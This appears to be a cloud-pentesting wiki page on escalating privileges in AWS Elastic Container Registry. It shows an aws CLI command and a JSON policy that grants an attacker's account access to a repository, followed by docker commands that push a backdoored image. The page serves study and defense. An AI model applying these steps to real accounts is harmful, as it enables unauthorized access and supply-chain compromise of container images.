# Elastic Container Registry (ECR)

## ecr:SetRepositoryPolicy

With access to these permissions, an attacker can create/modify a repository's resource permission policy, escalting their privileges. 

{% code overflow="wrap" %}

```bash
aws --region us-east-1 ecr set-repository-policy --repository-name tyler/my-private-repo --policy-text file://repo_policy.json
```

{% endcode %}

For the repository policy, the attacker could specify all AWS principals (any in the world):

* `"Principal": "*",`
* Or could specify the ARN of the their (attacker) account's root user (which actually allows anyone in the attacker's account these permissions):

{% code overflow="wrap" %}

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "AllowEveryone",
      "Effect": "Allow",
      "Principal": {
        "AWS": [
          "arn:aws:iam::<attacker-aws-account-id>:root"
        ]
      },
      "Action": [
        "ecr:PutImage",
        "ecr:DescribeImages",
        "ecr:ListImages",
        "ecr:DescribeRepositories",
        "ecr:GetAuthorizationToken"
      ]
    }
  ]
}
```

{% endcode %}

***

## ecr:PutImage

With access to this permission, an attacker could upload a compromised image e.g., one with a backdoor or that sends data back to a C\&C server (command and control).&#x20;

{% code overflow="wrap" %}

```bash
docker tag attacker-compromised-ubuntu:latest 111111111111.dkr.ecr.us-east-1.amazonaws.com/tyler/my-private-registry:ubuntu-latest

docker push 111111111111.dkr.ecr.us-east-1.amazonaws.com/tyler/my-private-registry:ubuntu-latest
```

{% endcode %}